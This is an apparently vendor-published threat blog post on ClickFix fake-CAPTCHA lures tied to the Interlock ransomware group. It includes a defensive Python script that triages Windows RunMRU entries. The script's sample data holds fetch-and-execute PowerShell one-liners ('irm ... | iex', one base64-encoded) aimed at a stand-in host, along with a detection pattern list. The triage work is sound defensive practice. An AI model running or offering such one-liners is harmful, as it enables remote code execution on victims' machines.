
Background
ClickFix has rapidly become a rampant social-engineering tactic. First observed in October 2023, it aims to trick users into pasting commands into the Windows Run dialog under the guise of verifying the user's connection and authenticity to the site. Given its ease of use and its ability to bypass technical security controls (the victim, not an exploit, executes the command), adoption of ClickFix has been growing at an alarming rate. [1]
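Because the lure relies on the victim pasting a command into the Run dialog, the command usually survives in the Windows RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which stores each Run-dialog entry as a value named a, b, c, ... with data of the form "<command>\1" and an MRUList value giving most-recent-first order. The following triage script is an added example written for this page, not code from LevelBlue or from the post's investigation: it parses that key layout, flags entries that look like ClickFix payloads, and decodes a PowerShell -EncodedCommand argument so the analyst sees the real script. The sample entries, the TEST-NET address 198.51.100.7 and the indicator list are constructed assumptions for illustration (the "I am not a robot" comment mimics the comment commonly appended to ClickFix commands so the Run dialog looks legitimate); tune the patterns to your environment.

```python
"""Triage the Windows RunMRU artifact for ClickFix-style pasted commands.

Added example for this page (not LevelBlue's code). RunMRU layout is a
documented Windows artifact; the sample data and indicator list below are
constructed assumptions, not findings from the post's investigation.
"""
import base64
import re
import sys
from typing import Dict, List, Optional, Tuple

# Heuristic indicators typical of ClickFix lures (assumption: tune per environment).
SUSPICIOUS_PATTERNS = [
    (r"\bpowershell(\.exe)?\b", "powershell"),
    (r"\bmshta(\.exe)?\b", "mshta"),
    (r"\b(curl|wget|bitsadmin|certutil)\b", "downloader"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", "ps-web-fetch"),
    (r"\biex\b|invoke-expression", "iex"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded-command"),
    (r"-w(indowstyle)?\s+hidden", "hidden-window"),
    (r"https?://", "url"),
    (r"i am not a robot|recaptcha|verification id|captcha", "captcha-lure"),
]

# Constructed sample: an encoded PowerShell payload built here so the block is self-contained.
ENCODED_SAMPLE = base64.b64encode("iex (irm http://198.51.100.7/a)".encode("utf-16-le")).decode()

# Constructed sample of the RunMRU key exactly as the registry stores it:
# value data ends in a literal backslash-1, MRUList orders the entries newest first.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "powershell -nop -w hidden -enc " + ENCODED_SAMPLE + "\\1",
    "c": 'powershell -w hidden -c "irm http://198.51.100.7/v.txt | iex" '
         '# "I am not a robot - reCAPTCHA Verification ID: 7391"\\1',
}


def parse_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (value_name, command) pairs most-recent-first, stripping the trailing \\1."""
    order = values.get("MRUList", "")
    names = list(order) if order else sorted(k for k in values if k != "MRUList")
    history = []
    for name in names:
        data = values.get(name)
        if data is None:
            continue
        command = data[:-2] if data.endswith("\\1") else data
        history.append((name, command))
    return history


def decode_encoded_command(command: str) -> Optional[str]:
    """If the command carries -e/-ec/-enc/-EncodedCommand <base64>, return the UTF-16LE script."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(values: Dict[str, str]) -> List[dict]:
    """Flag Run-dialog entries that match the ClickFix indicators, newest first."""
    findings = []
    for name, command in parse_runmru(values):
        hits = [tag for pattern, tag in SUSPICIOUS_PATTERNS
                if re.search(pattern, command, re.IGNORECASE)]
        decoded = decode_encoded_command(command)
        if decoded is not None:
            # Scan the decoded script too: the indicators hide inside the base64 blob.
            hits.append("decoded-payload")
            hits += [tag for pattern, tag in SUSPICIOUS_PATTERNS
                     if tag not in hits and re.search(pattern, decoded, re.IGNORECASE)]
        if hits:
            severity = "high" if "captcha-lure" in hits or len(hits) >= 3 else "low"
            findings.append({"value": name, "command": command, "decoded": decoded,
                             "indicators": hits, "severity": severity})
    return findings


def read_live_runmru() -> Dict[str, str]:
    """Read the current user's RunMRU via winreg (Windows only; returns {} elsewhere)."""
    if sys.platform != "win32":
        return {}
    import winreg  # only importable on Windows
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values: Dict[str, str] = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:  # no more values
                    break
                values[name] = data
                index += 1
    except OSError:  # key absent: the user never used the Run dialog
        pass
    return values


if __name__ == "__main__":
    for finding in triage(read_live_runmru() or SAMPLE_RUNMRU):
        print(finding["severity"], finding["value"], finding["indicators"])
        print("   ", finding["decoded"] or finding["command"])
```

RunMRU is per user and lives in NTUSER.DAT, so the same parser works against an offline hive export during forensics. Note the coverage limit: it only records what went through the Run dialog; ClickFix variants that steer the victim to a PowerShell window or the File Explorer address bar leave different artifacts (PowerShell transcript or ScriptBlock logs, Explorer typed paths), so pair this check with those sources.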

Executive Summary
This investigation began after a user was observed navigating to a legitimate website that presented a fake Captcha prompt. Once the instructions in the fake Captcha prompt were carried out, a command reaching out to a malicious domain led to malicious scripts and file downloads on the user's asset.
The Interlock ransomware group was first observed in September 2024. Unlike most ransomware groups seen today, which operate on a Ransomware as a Service (RaaS) model, Interlock is an independent group. They gained notoriety in October 2024 when they claimed responsibility for the Texas Tech University Health Sciences Center incident, which compromised the data of approximately 1.5 million patients.
In January 2025, researchers at Sekoia observed Interlock expanding its tactics and leveraging the social-engineering technique now known as ClickFix. [2]
Investigation
The LevelBlue MDR team observed two SentinelOne alarms on the same endpoint, which prompted further investigation. During the investigation, our analysts uncovered the threat actors' tactics, techniques, and procedures (TTPs) and identified indicators of compromise (IOCs) associated with the Interlock ransomware group. Due to the swift action of the LevelBlue MDR team, the attack was contained, and the file hashes from the investigation were added to the blocklist within SentinelOne.
Read the full blog to learn the key takeaways from LevelBlue's investigation, including recommendations to prevent these attacks from affecting your organization.
[2] https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar
The content provided herein is for general informational purposes only and should not be construed as legal, regulatory, compliance, or cybersecurity advice. Organizations should consult their own legal, compliance, or cybersecurity professionals regarding specific obligations and risk management strategies. While LevelBlue's Managed Threat Detection and Response solutions are designed to support threat detection and response at the endpoint level, they are not a substitute for comprehensive network monitoring, vulnerability management, or a full cybersecurity program.
